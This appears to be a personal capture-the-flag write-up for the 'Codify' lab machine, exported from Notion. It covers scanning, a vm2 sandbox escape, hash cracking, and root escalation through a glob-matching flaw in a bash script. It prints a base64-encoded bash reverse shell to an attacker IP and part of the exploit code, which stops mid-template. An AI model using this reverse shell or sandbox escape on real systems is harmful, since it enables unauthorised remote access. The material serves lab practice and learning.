<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title>codify</title><style>
/* cspell:disable-file */
/* webkit printing magic: print all background colors */
html {
	-webkit-print-color-adjust: exact;
}
* {
	box-sizing: border-box;
	-webkit-print-color-adjust: exact;
}

html,
body {
	margin: 0;
	padding: 0;
}
@media only screen {
	body {
		margin: 2em auto;
		max-width: 900px;
		color: rgb(55, 53, 47);
	}
}

body {
	line-height: 1.5;
	white-space: pre-wrap;
}

a,
a.visited {
	color: inherit;
	text-decoration: underline;
}

.pdf-relative-link-path {
	font-size: 80%;
	color: #444;
}

h1,
h2,
h3 {
	letter-spacing: -0.01em;
	line-height: 1.2;
	font-weight: 600;
	margin-bottom: 0;
}

.page-title {
	font-size: 2.5rem;
	font-weight: 700;
	margin-top: 0;
	margin-bottom: 0.75em;
}

h1 {
	font-size: 1.875rem;
	margin-top: 1.875rem;
}

h2 {
	font-size: 1.5rem;
	margin-top: 1.5rem;
}

h3 {
	font-size: 1.25rem;
	margin-top: 1.25rem;
}

.source {
	border: 1px solid #ddd;
	border-radius: 3px;
	padding: 1.5em;
	word-break: break-all;
}

.callout {
	border-radius: 3px;
	padding: 1rem;
}

figure {
	margin: 1.25em 0;
	page-break-inside: avoid;
}

figcaption {
	opacity: 0.5;
	font-size: 85%;
	margin-top: 0.5em;
}

mark {
	background-color: transparent;
}

.indented {
	padding-left: 1.5em;
}

hr {
	background: transparent;
	display: block;
	width: 100%;
	height: 1px;
	visibility: visible;
	border: none;
	border-bottom: 1px solid rgba(55, 53, 47, 0.09);
}

img {
	max-width: 100%;
}

@media only print {
	img {
		max-height: 100vh;
		object-fit: contain;
	}
}

@page {
	margin: 1in;
}

.collection-content {
	font-size: 0.875rem;
}

.collection-content td {
	white-space: pre-wrap;
	word-break: break-word;
}

.column-list {
	display: flex;
	justify-content: space-between;
}

.column {
	padding: 0 1em;
}

.column:first-child {
	padding-left: 0;
}

.column:last-child {
	padding-right: 0;
}

.table_of_contents-item {
	display: block;
	font-size: 0.875rem;
	line-height: 1.3;
	padding: 0.125rem;
}

.table_of_contents-indent-1 {
	margin-left: 1.5rem;
}

.table_of_contents-indent-2 {
	margin-left: 3rem;
}

.table_of_contents-indent-3 {
	margin-left: 4.5rem;
}

.table_of_contents-link {
	text-decoration: none;
	opacity: 0.7;
	border-bottom: 1px solid rgba(55, 53, 47, 0.18);
}

table,
th,
td {
	border: 1px solid rgba(55, 53, 47, 0.09);
	border-collapse: collapse;
}

table {
	border-left: none;
	border-right: none;
}

th,
td {
	font-weight: normal;
	padding: 0.25em 0.5em;
	line-height: 1.5;
	min-height: 1.5em;
	text-align: left;
}

th {
	color: rgba(55, 53, 47, 0.6);
}

ol,
ul {
	margin: 0;
	margin-block-start: 0.6em;
	margin-block-end: 0.6em;
}

li > ol:first-child,
li > ul:first-child {
	margin-block-start: 0.6em;
}

ul > li {
	list-style: disc;
}

ul.to-do-list {
	padding-inline-start: 0;
}

ul.to-do-list > li {
	list-style: none;
}

.to-do-children-checked {
	text-decoration: line-through;
	opacity: 0.375;
}

ul.toggle > li {
	list-style: none;
}

ul {
	padding-inline-start: 1.7em;
}

ul > li {
	padding-left: 0.1em;
}

ol {
	padding-inline-start: 1.6em;
}

ol > li {
	padding-left: 0.2em;
}

.mono ol {
	padding-inline-start: 2em;
}

.mono ol > li {
	text-indent: -0.4em;
}

.toggle {
	padding-inline-start: 0em;
	list-style-type: none;
}

/* Indent toggle children */
.toggle > li > details {
	padding-left: 1.7em;
}

.toggle > li > details > summary {
	margin-left: -1.1em;
}

.selected-value {
	display: inline-block;
	padding: 0 0.5em;
	background: rgba(206, 205, 202, 0.5);
	border-radius: 3px;
	margin-right: 0.5em;
	margin-top: 0.3em;
	margin-bottom: 0.3em;
	white-space: nowrap;
}

.collection-title {
	display: inline-block;
	margin-right: 1em;
}

.page-description {
	margin-bottom: 2em;
}

.simple-table {
	margin-top: 1em;
	font-size: 0.875rem;
	empty-cells: show;
}
.simple-table td {
	height: 29px;
	min-width: 120px;
}

.simple-table th {
	height: 29px;
	min-width: 120px;
}

.simple-table-header-color {
	background: rgb(247, 246, 243);
	color: black;
}
.simple-table-header {
	font-weight: 500;
}

time {
	opacity: 0.5;
}

.icon {
	display: inline-block;
	max-width: 1.2em;
	max-height: 1.2em;
	text-decoration: none;
	vertical-align: text-bottom;
	margin-right: 0.5em;
}

img.icon {
	border-radius: 3px;
}

.user-icon {
	width: 1.5em;
	height: 1.5em;
	border-radius: 100%;
	margin-right: 0.5rem;
}

.user-icon-inner {
	font-size: 0.8em;
}

.text-icon {
	border: 1px solid #000;
	text-align: center;
}

.page-cover-image {
	display: block;
	object-fit: cover;
	width: 100%;
	max-height: 30vh;
}

.page-header-icon {
	font-size: 3rem;
	margin-bottom: 1rem;
}

.page-header-icon-with-cover {
	margin-top: -0.72em;
	margin-left: 0.07em;
}

.page-header-icon img {
	border-radius: 3px;
}

.link-to-page {
	margin: 1em 0;
	padding: 0;
	border: none;
	font-weight: 500;
}

p > .user {
	opacity: 0.5;
}

td > .user,
td > time {
	white-space: nowrap;
}

input[type="checkbox"] {
	transform: scale(1.5);
	margin-right: 0.6em;
	vertical-align: middle;
}

p {
	margin-top: 0.5em;
	margin-bottom: 0.5em;
}

.image {
	border: none;
	margin: 1.5em 0;
	padding: 0;
	border-radius: 0;
	text-align: center;
}

.code,
code {
	background: rgba(135, 131, 120, 0.15);
	border-radius: 3px;
	padding: 0.2em 0.4em;
	border-radius: 3px;
	font-size: 85%;
	tab-size: 2;
}

code {
	color: #eb5757;
}

.code {
	padding: 1.5em 1em;
}

.code-wrap {
	white-space: pre-wrap;
	word-break: break-all;
}

.code > code {
	background: none;
	padding: 0;
	font-size: 100%;
	color: inherit;
}

blockquote {
	font-size: 1.25em;
	margin: 1em 0;
	padding-left: 1em;
	border-left: 3px solid rgb(55, 53, 47);
}

.bookmark {
	text-decoration: none;
	max-height: 8em;
	padding: 0;
	display: flex;
	width: 100%;
	align-items: stretch;
}

.bookmark-title {
	font-size: 0.85em;
	overflow: hidden;
	text-overflow: ellipsis;
	height: 1.75em;
	white-space: nowrap;
}

.bookmark-text {
	display: flex;
	flex-direction: column;
}

.bookmark-info {
	flex: 4 1 180px;
	padding: 12px 14px 14px;
	display: flex;
	flex-direction: column;
	justify-content: space-between;
}

.bookmark-image {
	width: 33%;
	flex: 1 1 180px;
	display: block;
	position: relative;
	object-fit: cover;
	border-radius: 1px;
}

.bookmark-description {
	color: rgba(55, 53, 47, 0.6);
	font-size: 0.75em;
	overflow: hidden;
	max-height: 4.5em;
	word-break: break-word;
}

.bookmark-href {
	font-size: 0.75em;
	margin-top: 0.25em;
}

.sans { font-family: ui-sans-serif, -apple-system, BlinkMacSystemFont, "Segoe UI Variable Display", "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol"; }
.code { font-family: "SFMono-Regular", Menlo, Consolas, "PT Mono", "Liberation Mono", Courier, monospace; }
.serif { font-family: Lyon-Text, Georgia, ui-serif, serif; }
.mono { font-family: iawriter-mono, Nitti, Menlo, Courier, monospace; }
.pdf .sans { font-family: Inter, ui-sans-serif, -apple-system, BlinkMacSystemFont, "Segoe UI Variable Display", "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK JP'; }
.pdf:lang(zh-CN) .sans { font-family: Inter, ui-sans-serif, -apple-system, BlinkMacSystemFont, "Segoe UI Variable Display", "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC'; }
.pdf:lang(zh-TW) .sans { font-family: Inter, ui-sans-serif, -apple-system, BlinkMacSystemFont, "Segoe UI Variable Display", "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK TC'; }
.pdf:lang(ko-KR) .sans { font-family: Inter, ui-sans-serif, -apple-system, BlinkMacSystemFont, "Segoe UI Variable Display", "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK KR'; }
.pdf .code { font-family: Source Code Pro, "SFMono-Regular", Menlo, Consolas, "PT Mono", "Liberation Mono", Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK JP'; }
.pdf:lang(zh-CN) .code { font-family: Source Code Pro, "SFMono-Regular", Menlo, Consolas, "PT Mono", "Liberation Mono", Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC'; }
.pdf:lang(zh-TW) .code { font-family: Source Code Pro, "SFMono-Regular", Menlo, Consolas, "PT Mono", "Liberation Mono", Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK TC'; }
.pdf:lang(ko-KR) .code { font-family: Source Code Pro, "SFMono-Regular", Menlo, Consolas, "PT Mono", "Liberation Mono", Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK KR'; }
.pdf .serif { font-family: PT Serif, Lyon-Text, Georgia, ui-serif, serif, 'Twemoji', 'Noto Color Emoji', 'Noto Serif CJK JP'; }
.pdf:lang(zh-CN) .serif { font-family: PT Serif, Lyon-Text, Georgia, ui-serif, serif, 'Twemoji', 'Noto Color Emoji', 'Noto Serif CJK SC'; }
.pdf:lang(zh-TW) .serif { font-family: PT Serif, Lyon-Text, Georgia, ui-serif, serif, 'Twemoji', 'Noto Color Emoji', 'Noto Serif CJK TC'; }
.pdf:lang(ko-KR) .serif { font-family: PT Serif, Lyon-Text, Georgia, ui-serif, serif, 'Twemoji', 'Noto Color Emoji', 'Noto Serif CJK KR'; }
.pdf .mono { font-family: PT Mono, iawriter-mono, Nitti, Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK JP'; }
.pdf:lang(zh-CN) .mono { font-family: PT Mono, iawriter-mono, Nitti, Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC'; }
.pdf:lang(zh-TW) .mono { font-family: PT Mono, iawriter-mono, Nitti, Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK TC'; }
.pdf:lang(ko-KR) .mono { font-family: PT Mono, iawriter-mono, Nitti, Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK KR'; }
.highlight-default {
	color: rgba(50, 48, 44, 1);
}
.highlight-gray {
	color: rgba(115, 114, 110, 1);
	fill: rgba(115, 114, 110, 1);
}
.highlight-brown {
	color: rgba(159, 107, 83, 1);
	fill: rgba(159, 107, 83, 1);
}
.highlight-orange {
	color: rgba(217, 115, 13, 1);
	fill: rgba(217, 115, 13, 1);
}
.highlight-yellow {
	color: rgba(203, 145, 47, 1);
	fill: rgba(203, 145, 47, 1);
}
.highlight-teal {
	color: rgba(68, 131, 97, 1);
	fill: rgba(68, 131, 97, 1);
}
.highlight-blue {
	color: rgba(51, 126, 169, 1);
	fill: rgba(51, 126, 169, 1);
}
.highlight-purple {
	color: rgba(144, 101, 176, 1);
	fill: rgba(144, 101, 176, 1);
}
.highlight-pink {
	color: rgba(193, 76, 138, 1);
	fill: rgba(193, 76, 138, 1);
}
.highlight-red {
	color: rgba(205, 60, 58, 1);
	fill: rgba(205, 60, 58, 1);
}
.highlight-default_background {
	color: rgba(50, 48, 44, 1);
}
.highlight-gray_background {
	background: rgba(248, 248, 247, 1);
}
.highlight-brown_background {
	background: rgba(244, 238, 238, 1);
}
.highlight-orange_background {
	background: rgba(251, 236, 221, 1);
}
.highlight-yellow_background {
	background: rgba(251, 243, 219, 1);
}
.highlight-teal_background {
	background: rgba(237, 243, 236, 1);
}
.highlight-blue_background {
	background: rgba(231, 243, 248, 1);
}
.highlight-purple_background {
	background: rgba(248, 243, 252, 1);
}
.highlight-pink_background {
	background: rgba(252, 241, 246, 1);
}
.highlight-red_background {
	background: rgba(253, 235, 236, 1);
}
.block-color-default {
	color: inherit;
	fill: inherit;
}
.block-color-gray {
	color: rgba(115, 114, 110, 1);
	fill: rgba(115, 114, 110, 1);
}
.block-color-brown {
	color: rgba(159, 107, 83, 1);
	fill: rgba(159, 107, 83, 1);
}
.block-color-orange {
	color: rgba(217, 115, 13, 1);
	fill: rgba(217, 115, 13, 1);
}
.block-color-yellow {
	color: rgba(203, 145, 47, 1);
	fill: rgba(203, 145, 47, 1);
}
.block-color-teal {
	color: rgba(68, 131, 97, 1);
	fill: rgba(68, 131, 97, 1);
}
.block-color-blue {
	color: rgba(51, 126, 169, 1);
	fill: rgba(51, 126, 169, 1);
}
.block-color-purple {
	color: rgba(144, 101, 176, 1);
	fill: rgba(144, 101, 176, 1);
}
.block-color-pink {
	color: rgba(193, 76, 138, 1);
	fill: rgba(193, 76, 138, 1);
}
.block-color-red {
	color: rgba(205, 60, 58, 1);
	fill: rgba(205, 60, 58, 1);
}
.block-color-default_background {
	color: inherit;
	fill: inherit;
}
.block-color-gray_background {
	background: rgba(248, 248, 247, 1);
}
.block-color-brown_background {
	background: rgba(244, 238, 238, 1);
}
.block-color-orange_background {
	background: rgba(251, 236, 221, 1);
}
.block-color-yellow_background {
	background: rgba(251, 243, 219, 1);
}
.block-color-teal_background {
	background: rgba(237, 243, 236, 1);
}
.block-color-blue_background {
	background: rgba(231, 243, 248, 1);
}
.block-color-purple_background {
	background: rgba(248, 243, 252, 1);
}
.block-color-pink_background {
	background: rgba(252, 241, 246, 1);
}
.block-color-red_background {
	background: rgba(253, 235, 236, 1);
}
.select-value-color-default { background-color: rgba(42, 28, 0, 0.07); }
.select-value-color-gray { background-color: rgba(28, 19, 1, 0.11); }
.select-value-color-brown { background-color: rgba(142, 58, 1, 0.141); }
.select-value-color-orange { background-color: rgba(213, 96, 0, 0.188); }
.select-value-color-yellow { background-color: rgba(209, 155, 0, 0.238); }
.select-value-color-green { background-color: rgba(1, 104, 42, 0.145); }
.select-value-color-blue { background-color: rgba(45, 149, 218, 0.236); }
.select-value-color-purple { background-color: rgba(104, 1, 184, 0.125); }
.select-value-color-pink { background-color: rgba(204, 1, 88, 0.137); }
.select-value-color-red { background-color: rgba(228, 26, 0, 0.148); }

.checkbox {
	display: inline-flex;
	vertical-align: text-bottom;
	width: 16;
	height: 16;
	background-size: 16px;
	margin-left: 2px;
	margin-right: 5px;
}

.checkbox-on {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20width%3D%2216%22%20height%3D%2216%22%20fill%3D%22%2358A9D7%22%2F%3E%0A%3Cpath%20d%3D%22M6.71429%2012.2852L14%204.9995L12.7143%203.71436L6.71429%209.71378L3.28571%206.2831L2%207.57092L6.71429%2012.2852Z%22%20fill%3D%22white%22%2F%3E%0A%3C%2Fsvg%3E");
}

.checkbox-off {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20x%3D%220.75%22%20y%3D%220.75%22%20width%3D%2214.5%22%20height%3D%2214.5%22%20fill%3D%22white%22%20stroke%3D%22%2336352F%22%20stroke-width%3D%221.5%22%2F%3E%0A%3C%2Fsvg%3E");
}
	
</style></head><body><article id="25b11a38-2ed9-803d-8ab0-c8d53952c00a" class="page sans"><header><h1 class="page-title">codify</h1><p class="page-description"></p></header><div class="page-body"><p id="25b11a38-2ed9-8003-bcb6-dbce3e8d8114" class="">
</p><p id="25b11a38-2ed9-8044-9731-db8f3216afaf" class="">run nmap command </p><p id="25b11a38-2ed9-809e-b471-f9bd52c03e20" class="">nmap -A -T5 10.10.11.239 --min-rate=500 -p-<br/></p><figure id="25b11a38-2ed9-80bc-afab-f98a8a130011" class="image"><a href="codify%2025b11a382ed9803d8ab0c8d53952c00a/image.png"><img style="width:709.984375px" src="codify%2025b11a382ed9803d8ab0c8d53952c00a/image.png"/></a></figure><p id="25b11a38-2ed9-8017-a878-ef1f5a65a3ad" class="">from the results for port 80 , i added codify.htb to the /etc/hosts</p><figure id="25b11a38-2ed9-80e1-8b76-e5038f340d29" class="image"><a href="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%201.png"><img style="width:530px" src="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%201.png"/></a></figure><p id="25b11a38-2ed9-8060-8929-e65990efe7b0" class="">checking for searchsploit for apache httpd version</p><figure id="25b11a38-2ed9-80cb-8822-cd44f84c2843" class="image"><a href="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%202.png"><img style="width:709.953125px" src="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%202.png"/></a></figure><p id="25b11a38-2ed9-8022-b9a4-f77d15a3429a" class="">
</p><p id="25b11a38-2ed9-8071-9f9c-f020edd878f9" class="">nikto results</p><figure id="25b11a38-2ed9-800f-8547-e07affc3d94d" class="image"><a href="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%203.png"><img style="width:709.96875px" src="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%203.png"/></a></figure><p id="25b11a38-2ed9-8063-90cf-cbaf7cc61560" class="">
</p><p id="25b11a38-2ed9-8018-a13d-c08e1e64d90a" class="">nothing interesting on nikto results.</p><p id="25b11a38-2ed9-803c-aabe-ce32db4e395e" class="">moving on to the website</p><p id="25b11a38-2ed9-80cb-8f46-dad53ce59071" class="">port 80 and 3000 have same websites</p><figure id="25b11a38-2ed9-809d-aadc-cb82cc8ed747" class="image"><a href="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%204.png"><img style="width:709.984375px" src="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%204.png"/></a></figure><figure id="25b11a38-2ed9-80c3-ac1e-cac9d8ea8304" class="image"><a href="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%205.png"><img style="width:709.96875px" src="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%205.png"/></a></figure><p id="25b11a38-2ed9-80d0-9d26-cdd56bb84a64" class="">
</p><p id="25b11a38-2ed9-80c7-8ff3-f93fbf3cf31b" class="">from about us found the version of vm2 used.</p><figure id="25b11a38-2ed9-808f-a583-df05fbc15611" class="image"><a href="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%206.png"><img style="width:709.96875px" src="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%206.png"/></a></figure><figure id="25b11a38-2ed9-80bd-8ccf-f7b92125000e"><div class="source">https://github.com/patriksimek/vm2/releases/tag/3.9.16</div></figure><p id="25b11a38-2ed9-80dd-81c1-fcc21a388ac6" class="">
</p><p id="25b11a38-2ed9-804f-a4da-c797b4ec82f8" class="">this particular software was disabled due to security issues so this version could also possibly have some potential for RCE</p><figure id="25b11a38-2ed9-8005-98f1-c680c2373743" class="image"><a href="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%207.png"><img style="width:709.96875px" src="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%207.png"/></a></figure><p id="25b11a38-2ed9-802a-8c2b-c942e31ae16e" class="">modules allowed</p><p id="25b11a38-2ed9-807b-a718-fbd591c4618d" class="">
</p><p id="25b11a38-2ed9-80f6-a347-f93c97a06cc9" class="">found exploit on exploit-db</p><p id="25b11a38-2ed9-8049-b066-fcda972cc12a" class=""><a href="https://www.exploit-db.com/exploits/51898">https://www.exploit-db.com/exploits/51898</a></p><p id="25b11a38-2ed9-80c0-9e35-d030a653a106" class="">i was not able to get a reverse shell with a simple bash command so i used a base64 encoded shell</p><p id="25b11a38-2ed9-8001-bb17-fa16131f44a6" class="">final exploit</p><p id="25b11a38-2ed9-80b2-bb15-cf81cce07733" class="">const { VM } = require(&quot;vm2&quot;);<br/>const vm = new VM();</p><p id="25b11a38-2ed9-80aa-9315-d831a905cfb4" class="">const command = &quot;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4yOC80NDQ0IDA+JjEK |base64 -d| bash &quot;; // Change to the desired command</p><p id="25b11a38-2ed9-8033-add6-c1a8e8b84b34" class="">const code = `<br/>async function fn() {<br/>(function stack() {<br/>new Error().stack;<br/>stack();<br/>})();<br/>}</p><p id="25b11a38-2ed9-80b3-a4aa-fc7ebd19c726" class="">try {<br/>const handler = {<br/>getPrototypeOf(target) {<br/>(function stack() {<br/>new Error().stack;<br/>stack();<br/>})();<br/>}<br/>};</p><p id="25b11a38-2ed9-809b-948b-c8f4263b4d8f" class="">
</p><p id="25b11a38-2ed9-8073-9029-d6785b797f6b" class="">reverse shell as codify</p><figure id="25b11a38-2ed9-80f1-954e-edeb90d4a0eb" class="image"><a href="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%208.png"><img style="width:709.96875px" src="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%208.png"/></a></figure><p id="25b11a38-2ed9-803f-bca8-f448634150bb" class="">
</p><p id="25b11a38-2ed9-80d5-b91b-c929b81f8a09" class="">this was not the user with user.txt flag, there wass another user joshua</p><p id="25b11a38-2ed9-804d-baa8-fa5267b28f6c" class="">downloaded linenum with curl</p><figure id="25b11a38-2ed9-8078-9ac9-e06d6c877ce5" class="image"><a href="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%209.png"><img style="width:699px" src="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%209.png"/></a></figure><p id="25b11a38-2ed9-80e9-a93f-cecc01313c1f" class="">on kali</p><figure id="25b11a38-2ed9-8047-b53d-cd6ff2eef191" class="image"><a href="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2010.png"><img style="width:638px" src="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2010.png"/></a></figure><p id="25b11a38-2ed9-8067-abf7-df56d5abdb22" class="">only interesting thing was this db running on 3306 - a port forwarde attempt was unsuccessful ( couldnt really test it without credentials anyway)</p><figure id="25b11a38-2ed9-80d3-9876-ec426ca644a2" class="image"><a href="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2011.png"><img style="width:709.953125px" src="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2011.png"/></a></figure><p id="25b11a38-2ed9-80e8-a32a-ef3ab0b7cbe8" class="">
</p><p id="25b11a38-2ed9-8023-98f1-e4a6e7f67862" class="">but no credentials were present for it</p><p id="25b11a38-2ed9-8045-90f7-fd1f70938522" class="">there were no interesting passwords or credentials or files in home directory either</p><p id="25b11a38-2ed9-8013-b19a-cc93cdfc3e99" class="">going to /var/www since that is usually where web server files are contained</p><figure id="25b11a38-2ed9-8066-8866-dea7a3729ab8" class="image"><a href="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2012.png"><img style="width:461px" src="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2012.png"/></a></figure><p id="25b11a38-2ed9-80e7-8318-e5fba9558ad8" class="">editor was the service through which we gained access, nothing interesting in it sfiles so switching to contact</p><p id="25b11a38-2ed9-8096-b757-d9287aabfd85" class="">found index.js</p><figure id="25b11a38-2ed9-8020-b6dd-c70b912d8e64" class="image"><a href="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2013.png"><img style="width:709.96875px" src="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2013.png"/></a></figure><p id="25b11a38-2ed9-8004-bccc-d5e8319d8d0e" class="">
</p><p id="25b11a38-2ed9-80dc-b339-f8bfa15ad5aa" class="">now nothing is running on port 3000 or 3001 internally or externally so couldnt do much with hardcoded session data</p><p id="25b11a38-2ed9-8084-ae6a-d82e90dd507b" class="">although an sqlite database tickets.db was running</p><p id="25b11a38-2ed9-8058-9653-ceb002f19ea5" class="">you can access sqlite database without creds(shell should be upgraded)</p><figure id="25b11a38-2ed9-800b-bbdd-de36e3b7a286" class="image"><a href="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2014.png"><img style="width:707px" src="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2014.png"/></a></figure><p id="25b11a38-2ed9-801c-a9e5-ebce204f3c78" class="">
</p><p id="25b11a38-2ed9-8041-9d98-e3905e55277a" class="">user joshua’s password</p><figure id="25b11a38-2ed9-8087-90ee-c202ef136adf" class="image"><a href="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2015.png"><img style="width:696px" src="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2015.png"/></a></figure><p id="25b11a38-2ed9-80fb-bdd6-d510fb0e44a0" class="">using john to crack it</p><figure id="25b11a38-2ed9-8014-8cdb-ed875e4ec68f" class="image"><a href="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2016.png"><img style="width:686px" src="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2016.png"/></a></figure><p id="25b11a38-2ed9-807d-a190-dece753689a0" class="">login to joshua with ssh and sudo -l</p><figure id="25b11a38-2ed9-800a-ae2e-d0cf0de1a16a" class="image"><a href="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2017.png"><img style="width:709.953125px" src="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2017.png"/></a></figure><p id="25b11a38-2ed9-8094-9d0a-f4c94e37e39c" class="">found mysql backup, viewing contents</p><figure id="25b11a38-2ed9-809d-99d0-e0d3d26d5758" class="image"><a href="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2018.png"><img style="width:709.984375px" src="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2018.png"/></a></figure><p id="25b11a38-2ed9-80da-969b-f57ac1df83da" class="">
</p><p id="25b11a38-2ed9-80e6-be1c-dbb32ebd458c" class="">to run the file logic is that when in bash script if comparison is done iinside [[ ]] and the right side is not in quotes it treated not as string but pattern. so * would be bypass the actual password</p><p id="25b11a38-2ed9-806a-a36e-f236f9bcadc8" class="">to observe the commands run during the process we used pspy(referred 0xdf)</p><p id="25b11a38-2ed9-80a2-8df2-c541f58e8f6a" class=""><a href="https://github.com/DominicBreuker/pspy?tab=readme-ov-file">https://github.com/DominicBreuker/pspy?tab=readme-ov-file</a></p><p id="25b11a38-2ed9-806c-80da-fb7ebae9a81e" class="">
</p><p id="25b11a38-2ed9-80d1-ad85-c3290a740b5d" class="">download with curl and run</p><figure id="25b11a38-2ed9-8051-a0bc-d8abfeb7e1a3" class="image"><a href="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2019.png"><img style="width:694px" src="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2019.png"/></a></figure><p id="25b11a38-2ed9-80bc-9dbf-cc253dc0c577" class="">running the script</p><figure id="25b11a38-2ed9-804a-95b7-d2fd1cc245af" class="image"><a href="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2020.png"><img style="width:709.953125px" src="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2020.png"/></a></figure><p id="25b11a38-2ed9-80da-919e-f0851df978a2" class="">
</p><p id="25b11a38-2ed9-809f-88be-cbcdc9617772" class="">password in pspy</p><figure id="25b11a38-2ed9-802f-ab93-dc684f1d1263" class="image"><a href="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2021.png"><img style="width:709.96875px" src="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2021.png"/></a></figure><p id="25b11a38-2ed9-803f-8c2a-c3ddfc86c79c" class="">
</p><p id="25b11a38-2ed9-8040-aabb-e673de03417e" class="">switching with su to root</p><figure id="25b11a38-2ed9-8070-9196-cc54c658cb5e" class="image"><a href="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2022.png"><img style="width:702px" src="codify%2025b11a382ed9803d8ab0c8d53952c00a/image%2022.png"/></a></figure><p id="25b11a38-2ed9-8041-9b72-febb7e021d72" class="">
</p><p id="25b11a38-2ed9-80dc-8dc9-d34b5781ff6f" class="">this was a machine with relatively easy initial access although switching to joshua was a bit tricky because enumerating folders to reach the right conclusion is slightly vague and can take a lot of time if not looking in the right spot. escalation to root was easy but because i wasnt aware of pspy it took me referring walkthroughs to finish.</p></div></article><span class="sans" style="font-size:14px;padding-top:2em"></span></body></html>